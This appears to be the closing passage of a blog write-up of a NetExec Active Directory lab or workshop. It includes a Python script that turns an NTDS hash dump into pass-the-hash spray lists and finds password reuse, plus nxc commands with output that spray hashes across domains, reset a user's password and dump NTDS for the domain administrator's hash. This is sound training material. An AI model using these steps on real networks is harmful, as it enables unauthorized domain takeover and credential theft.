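The one-liner above does the job, but on a real dump it also feeds krbtgt, machine accounts and the empty-password hash into the spray, and it throws away the most useful signal: which accounts share a hash. The Python below is an added example, not NetExec’s code. It runs over a constructed .ntds sample that reuses hashes from the dump above plus one invented svc_backup line, filters the hashes worth spraying, pairs each user with its own hash for NetExec’s --no-bruteforce mode (user[i] tried with hash[i] instead of every combination), and reports shared hashes, which is exactly the kind of password reuse a cross-domain spray hits.

```python
"""Turn a NetExec .ntds dump into spray lists and spot password reuse (added example)."""
import re
from collections import OrderedDict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
# domain\user:rid:lm:nt:::[ optional status text] ; the domain prefix is absent for machine accounts
LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::(?P<rest>.*)$", re.I)

# Constructed sample: hashes copied from the dump above, svc_backup invented to show reuse.
SAMPLE_NTDS = """\
rebels.local\\administrator:500:aad3b435b51404eeaad3b435b51404ee:6db5eb0d52b4016139ea90b2f36a652d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8197f5b787e8ed87845d94cae97f9758:::
rebels.local\\finn:1113:aad3b435b51404eeaad3b435b51404ee:6bf5bfe70e178247f3d433ce3d02fae4:::
rebels.local\\rey:1114:aad3b435b51404eeaad3b435b51404ee:dd6a2b0a07e11f04518fb7470ba10bf9:::
rebels.local\\poe:1116:aad3b435b51404eeaad3b435b51404ee:15267fa2b302e8d98d13fb36d2dbbd64:::
rebels.local\\svc_backup:1130:aad3b435b51404eeaad3b435b51404ee:6bf5bfe70e178247f3d433ce3d02fae4:::
DANTOOINE$:1103:aad3b435b51404eeaad3b435b51404ee:2ede1c63b1a60dce4638bc925a4d77d1:::
"""


def parse_ntds(text: str) -> list:
    """One dict per account line; banners and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["rid"] = int(d["rid"])
        d["nt"] = d["nt"].lower()
        d["machine"] = d["user"].endswith("$")
        d["disabled"] = "disabled" in d["rest"].lower()
        rows.append(d)
    return rows


def _sprayable(r: dict, include_machines: bool, include_krbtgt: bool) -> bool:
    # disabled accounts cannot log on; the empty hash is noise; machine secrets are random;
    # krbtgt never logs on, so its hash only matters for golden tickets, not spraying
    if r["disabled"] or r["nt"] == EMPTY_NT:
        return False
    if r["machine"] and not include_machines:
        return False
    if r["user"].lower() == "krbtgt" and not include_krbtgt:
        return False
    return True


def spray_hashes(rows: list, include_machines: bool = False, include_krbtgt: bool = False) -> list:
    """Unique NT hashes in first-seen order, for `nxc smb <targets> -u users.txt -H hashes.txt`."""
    seen = OrderedDict()
    for r in rows:
        if _sprayable(r, include_machines, include_krbtgt):
            seen.setdefault(r["nt"], r["user"])
    return list(seen)


def spray_pairs(rows: list) -> tuple:
    """Aligned (users, hashes) lists for `--no-bruteforce`, i.e. each user with its own hash."""
    keep = [r for r in rows if _sprayable(r, False, False)]
    return [r["user"] for r in keep], [r["nt"] for r in keep]


def shared_hashes(rows: list) -> dict:
    """Hashes used by more than one account: identical NT hash means identical password."""
    by_hash = {}
    for r in rows:
        if r["nt"] != EMPTY_NT:
            by_hash.setdefault(r["nt"], []).append(r["user"])
    return {h: u for h, u in by_hash.items() if len(u) > 1}


if __name__ == "__main__":
    rows = parse_ntds(SAMPLE_NTDS)
    print("\n".join(spray_hashes(rows)))  # redirect to users/hashes.txt
    for h, users in shared_hashes(rows).items():
        print(f"reuse: {h} shared by {', '.join(users)}")
```

Spraying a hash list against a user list multiplies attempts (users × hashes), so on a domain with a lockout policy prefer the paired mode or a short, deduplicated hash list; the shared-hash report is also what to look at first when a dump from one domain is sprayed at another, since a hit there is a reused password rather than a weak one.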

Password Spraying on empire.local πŸ’¦

Then spray them on the other domain:

nxc smb scope/dc.txt -u users/all-users.txt -H users/hashes.txt
SMB         10.0.0.5        445    coruscant        [+] empire.local\fn2187:6bf5bfe70e178247f3d433ce3d02fae4

We get a hit with fn2187. The hash that worked is finn’s (rebels.local\finn has the same NT hash 6bf5bfe7…), so this is the same password reused across both domains. As we saw earlier, this account has a path to domain admin since it can change vader’s password:

Finally we can change vader’s password to get domain administrator of empire.local with the change-password module:

nxc smb 10.0.0.5 -u fn2187 -H 6bf5bfe70e178247f3d433ce3d02fae4 -M change-password -o USER=vader NEWPASS=potato123!
SMB         10.0.0.5        445    coruscant        [*] Windows Server 2022 Build 20348 x64 (name:coruscant) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    coruscant        [+] empire.local\fn2187:6bf5bfe70e178247f3d433ce3d02fae4
CHANGE-P... 10.0.0.5        445    coruscant        [+] Successfully changed password for vader

Then dump NTDS on empire.local to get the Domain Administrator’s NT hash (the RID 500 account, renamed localadmin in this domain):

nxc smb 10.0.0.5 -u vader -p potato123! --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] Y
SMB         10.0.0.5        445    coruscant        [*] Windows Server 2022 Build 20348 x64 (name:coruscant) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    coruscant        [+] empire.local\vader:potato123!
SMB         10.0.0.5        445    coruscant        [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB         10.0.0.5        445    coruscant        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.0.0.5        445    coruscant        localadmin:500:aad3b435b51404eeaad3b435b51404ee:2ca98fe859493f43996323332531b51e:::

Thanks & Final Thoughts

Huge thanks to @mpgn_x64, @wil_fri3d and @_zblurx for organizing this workshop for yet another year. I’m pleased that I managed to complete both domains this year 😁!

Congratulations to @LeandreOnizuka for the first place πŸ† and wfrnds1 for the second place!

I ended up completing the lab in just under 5 hours as you can see from the timestamp below:

Hopefully I do better next year and maybe get a place on the podium 🀞 (and a seat in the workshop room if there is more space and plugs to charge my laptop 🀣. I ended up squatting the DGSE’s stand 😎)!

Nonetheless I learnt to use a bunch of different/new modules/flags that I had never tested before such as:

  • --nla-screenshot
  • --no-preauth-targets
  • -M enum_logins
  • -M link_xpcmd
  • -M backup_operator
  • -M change-password

As shown throughout this writeup, NetExec is getting to a stage where it can be used “almost” exclusively (shoutout secretsdump 😆) to perform Active Directory pentesting. This is thanks to the massive work of all its awesome contributors.

If you have any ideas on cool modules that could be added or any quality of life changes go for it and make a PR. As an example here is a recent Recycle Bin PR that I developed (and still need to integrate with @Dfte’s module πŸ˜…) to enumerate and download files in the Recycle Bin. It really is a surprisingly easy development process and there are plenty of templates from other modules that you can use to get started.

I will be releasing a blog post soon on how to create your first NetExec module if you’re interested.

Hope you learnt something new and I look forward to hanging out next year and owning the domains even faster!